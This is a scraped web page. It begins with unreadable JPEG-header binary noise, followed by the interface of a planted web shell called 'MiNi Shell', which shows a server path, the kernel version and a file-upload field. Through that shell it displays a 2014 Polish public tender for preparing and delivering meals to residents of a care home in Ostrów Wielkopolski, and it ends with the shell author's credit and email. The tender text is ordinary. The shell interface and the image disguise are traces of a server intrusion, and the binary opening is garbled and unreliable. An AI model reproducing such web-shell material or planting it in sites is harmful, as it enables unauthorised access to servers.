JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140925/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140925/203603-N-2014.html

<p class="kh_header"><b>Ostrów Wielkopolski: Przetarg nieograniczony na świadczenie usług przygotowania 
i dostarczania posiłków dla mieszkańców 
Domu Pomocy Społecznej im. s. M. Benodyny - Koterbianki 
w Ostrowie Wielkopolskim</b><br>
<b>Numer ogłoszenia: 203603 - 2014; data zamieszczenia: 25.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej im. s.M. Benodyny Koterbianki , ul. Partyzancka 8, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 7364254, faks 062 7355473.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-ostrowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na świadczenie usług przygotowania 
i dostarczania posiłków dla mieszkańców 
Domu Pomocy Społecznej im. s. M. Benodyny - Koterbianki 
w Ostrowie Wielkopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług przygotowania i dostarczania całodziennych posiłków w tym diet dla 42 mieszkańców Domu Pomocy Społecznej  kobiet i mężczyzn bez możliwości dzierżawienia pomieszczeń w/w Domu. 
2.	Przedmiot zamówienia obejmować będzie następujące diety:
a)	normalna- śniadanie, obiad, posiłek dodatkowy, kolacja
b)	lekka- śniadanie, obiad, posiłek dodatkowy, kolacja
c)	cukrzyca wyrównana - śniadanie, II śniadanie, obiad, podwieczorek, kolacja
d)	cukrzyca niskotłuszczowa - śniadanie, II śniadanie, obiad, podwieczorek, kolacja
e)	wysoko białkowa - śniadanie, II śniadanie, obiad, podwieczorek, kolacja 
f)	niskotłuszczowa - śniadanie, obiad, posiłek dodatkowy, kolacja
g)	płynna	- śniadanie, II śniadanie, obiad, podwieczorek, kolacja
h)	inna w zależności od zlecenia lekarza 
3.	Wykonawca dostarczy posiłki w atestowanych do transportu żywności naczyniach                        i termosach zapewniających odpowiednią temperaturę zgodnie z HACCP tut. Domu :
a)	gorące zupy 75oC,
b)	gorące drugie dania 68oC,
c)	gorące napoje 80oC,
d)	sałatki i surówki 4oC. 
4.	Wykonawca w ramach przedmiotu zamówienia dostarczy poporcjowane: wędliny, sery, mięso, masło, ciasto, pieczywo w zależności od posiłku dodatkowego również ten posiłek.
5.	Wykonawca jest zobowiązany wykonać posiłki z naturalnych produktów metodą tradycyjną, nie używając produktów typu instant oraz gotowych produktów np. mrożone knedle, pierogi itp.
6.	Podstawę do sporządzania posiłków stanowi wykaz norm żywieniowych opracowany przez Instytut Żywności i Żywienia. 
7.	Wykonawca sporządzi i przedstawi Zamawiającemu normy żywienia dla mieszkańców domu .
PRZEDZIAŁ WIEKOWY I LICZBA MIESZKAŃCÓW DPS (stan na dzień 25 września 2014 r.):
kobiety: 
1 - wiek 31 - 50;
2 - wiek 51 - 65;
4 - wiek 66 - 75;
16 - wiek powyżej 75;
mężczyźni:
1 - wiek 31 - 50;
12 - wiek 51 - 65;
5 - wiek 66 - 75;
1 powyżej 75;


Zamawiający w przypadku zmian poszczególnych przedziałów przedstawi Wykonawcy nowy podział. Wykonawca w terminie 7 dni od otrzymania dokona nowego wykazu norm.
8.	Godziny dostarczania posiłków:
a)	śniadanie i II śniadanie od godziny 8:00 do godziny 8:30,
b)	obiad , podwieczorek i posiłek dodatkowy od godziny 12:00 do godziny 12:30
c)	kolacja od godziny 17:30 do godziny18:00. 
9.	Zamawiający dopuszcza możliwość dostarczania kolacji wraz z obiadem, jeżeli nie stanowi ona posiłku ciepłego. Należy wówczas dostarczyć napoje w postaci instant - herbata i cukier. 
10.	Wykonawca we własnym zakresie uzgodni z dietetykiem i  przedstawi Zamawiającemu miesięczny jadłospis, na 3 dni przed końcem miesiąca celem akceptacji przez Zamawiającego. Jadłospis miesięczny musi być sporządzony i zatwierdzony przez dietetyka Wykonawcy osobno dla każdej z diet z podaniem:
a)	gramatury, kaloryczności, białka, tłuszczu, węglowodanów, witaminy A i C,
b)	bez możliwości powtórzenia się rodzaju posiłku w tygodniu, 
c)	uwzględniający ciasto 2x w tygodniu i święta, 
d)	1x w tygodniu kolacja na ciepło,
e)	1x w tygodniu śniadanie na ciepło,
f)	uwzględniający tradycję posiłków w przypadku świąt (Wigilia Bożego Narodzenia, Śniadanie Wielkanocne),
11.	Pierwszy jadłospis zostanie dostarczony Zamawiającemu nie później niż 1 dzień od dnia podpisania umowy. W przypadku nie zatwierdzenia jadłospisu przez Zamawiającego, Wykonawca przedstawi niezwłocznie w ciągu 2 dni inną propozycję.
12.	Dzienną ilość posiłków i diet Zamawiający ustali z Wykonawcą na podstawie pisemnego zamówienia dzień wcześniej do godziny 9:00. W przypadku zmiany ilości posiłków i diet Zamawiający poinformuje Wykonawcę telefonicznie do godziny 15.00.
13.	Przygotowywanie i transportowanie posiłków będzie odbywać się z zachowaniem wszystkich obowiązujących przepisów sanitarno-higienicznych.
14.	Zamawiający zwróci Wykonawcy po wydanych posiłkach brudne pojemniki wraz                              z niewydanymi posiłkami w godzinach:
a)	śniadanie od godziny 10.00 do godziny 11.00
b)	obiad od godziny 14.00 do godziny 15.00
c)	kolacja po godzinie 20.00
15.	Zamawiający wymaga, aby Wykonawca w ramach niniejszego zamówienia dostarczał następujące produkty: 
a)	raz w miesiącu dżem niskosłodzony o zróżnicowanych smakach (np. truskawka, wiśnia, brzoskwinia) - 3 słoiki po 250 g każdy,
b)	raz w miesiącu margaryna do smarowania pieczywa - w ilości 3 sztuk o wadze 250 g każda, 
c)	raz w miesiącu herbata czarna ekspresowa - 1 paczka po 100 sztuk torebek,
d)	raz w kwartale dodatkowych 3 blach ciasta (o wymiarach blachy 42cm/25cm ). Rodzaje ciasta wskaże Zamawiający poniższego rodzaju: sernik, makowiec, szarlotka, biszkopt z galaretką, ptasie mleczko, kruche z owocem, drożdżowe.
16.	Wykonawca jest zobowiązany do pobierania i przechowywania próbek podanych posiłków w specjalnie przeznaczonych do tego lodówkach przez okres 72 godz. od upływu dnia podania. Pobór próbek i ich przechowywanie następuje zgodnie z wymogami rozporządzenia Ministra Zdrowia z dnia 17.04.2007r. w sprawie pobierania  i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego (Dz. U. z 2007r. nr 80 poz. 545 z późn. zm.).

Szczegółowy zakres dla poszczególnych jadłospisów został zawarty w załączniku nr 6 do siwz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca znajdował się pod nadzorem właściwego inspektora sanitarnego.
Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy i kopii dokumentu potwierdzającego znajdowanie się pod nadzorem właściwego inspektora sanitarnego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>oświadczenie o spełnianiu warunków udziału w postępowaniu;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału 
w postępowaniu na zasoby innych podmiotów, które będą brały udział 
w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy:
1)	w przypadku warunku , o którym mowa w art. 22 ust. 1 pkt 4 ustawy - oświadczenie o spełnianiu warunków udziału w postępowaniu;
2)	dokument z którego będzie wynikało:
a)	jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu,
b)	w jaki sposób nastąpi wykorzystanie zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)	charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów następujących dokumentów:
- oświadczenie o braku podstaw do wykluczenia;
- aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca zobowiązany jest do sporządzenia z uwzględnieniem wymogów zawartych w załączniku nr 2 do siwz oraz złożenia wraz z ofertą:
a) wzoru jadłospisu dziennego z uwzględnieniem wymagań określonych w załączniku nr 2 i załączniku nr 6 do siwz;
b) wzoru jadłospisu miesięcznego z uwzględnieniem wymagań określonych w załączniku 
nr 2 i załączniku nr 6 do siwz;
c) dokument potwierdzający, że wykonawca znajduje się pod nadzorem właściwego inspektora sanitarnego.
2. Zamawiający oceni spełnianie wymagań dla przedmiotu zamówienia m.in. na podstawie załączników do siwz nr 1, 2 i 6, które należy uzupełnić, podpisać i dołączyć do oferty, tj. 
a) załącznik do siwz nr 1 - formularz oferty, w którym Wykonawca składa stosowne oświadczenia,
b) załącznik do siwz nr 2 - opis wymaganego przedmiotu zamówienia oraz na podstawie sporządzonych przez Wykonawcę oraz dołączonych do oferty wzorów jadłospisów (dzienny 
i miesięczny).
c) załącznik nr 6 - spis jadłospisów dla poszczególnych diet należy parafować i załączyć do oferty;
3. Na podstawie ww dokumentów Zamawiający dokona oceny spełniania przez przedmiot zamówienia wymagań określonych w siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-ostrowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej im. s. M. Benodyny - Koterbianki 
ul. Partyzancka 8, 63 - 400 Ostrów Wielkopolski - sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2014 godzina 08:25, miejsce: Dom Pomocy Społecznej im. s. M. Benodyny - Koterbianki 
ul. Partyzancka 8, 63 - 400 Ostrów Wielkopolski - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com